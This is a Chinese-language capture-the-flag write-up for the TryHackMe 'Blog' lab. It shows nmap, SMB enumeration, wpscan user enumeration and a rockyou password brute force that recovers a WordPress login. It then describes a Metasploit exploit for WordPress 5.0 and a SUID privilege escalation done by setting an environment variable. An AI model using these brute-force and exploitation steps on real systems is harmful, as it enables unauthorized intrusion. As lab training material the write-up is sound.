【THM】Blog-Practice
【THM】Blog-Practice
hihopkc本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/blog
Difficulty: Medium
Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!
Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get what you need? Or will you fall down the rabbit hole…
In order to get the blog to work with AWS, you’ll need to add blog.thm to your /etc/hosts file.
Credit to Sq00ky for the root privesc idea ;)
端口扫描
1 | nmap -p- -sC -sV -T4 10.10.131.180 |
PORT STATE SERVICE
22 open ssh
80 open http
139 open netbios-ssn
445 open netbios-ssn
首先我们看到有smb端口 我们尝试用enum4linux来枚举
1 | enum4linux -a 10.10.131.180 |
我们可以看到有个BillySMB
1 | smbclient //10.10.131.180/BillySMB |
下载下来
找到一个兔子洞,什么意思
还有一个二维码,跳转到
最后一个文件则是mp4
似乎进入了死洞
首先检查80端口
看看有什么
1 | gobuster dir -u 10.10.131.180 -w /usr/share/wordlists/rockyou.txt |
检查robots.txt
1 | User-agent: * |
这是一个非常标准的 Wordpress 网站。对于枚举,我们有一个很棒的工具,称为wpscan,它允许我们枚举用户名,然后暴力破解它们
但是10.10.131.180/wp-admin/好像访问不了
我们就编辑/etc/hosts
1 | 10.10.131.180 blog.thm |
1 | wpscan --url 10.10.131.180 --enumerate u |
有两个用户:bjoel 和 kwheel
而且这是易受攻击的WordPress 5.0
通过阅读它,我们了解到我们需要具有作者访问权限的人的用户名和密码
那我们就开始爆破
1 | wpscan --url 10.10.90.177 -U kwheel,bjoel -P /usr/share/wordlists/rockyou.txt --password-attack wp-login -t 64 |
1 | | Username: kwheel, Password: cutiepie1 |
成功登上
然后用msf
现在只需设置选项(USERNAME、PASSWORD、RHOSTS、LHOST)并利用!
getshell
1 | find / -perm -u=s -type f 2>/dev/null |
因此,它获取“admin”环境变量并打印出“Not an Admin”。等等,那么如果我们设置这个环境变量,会发生什么
1 | export admin=1 |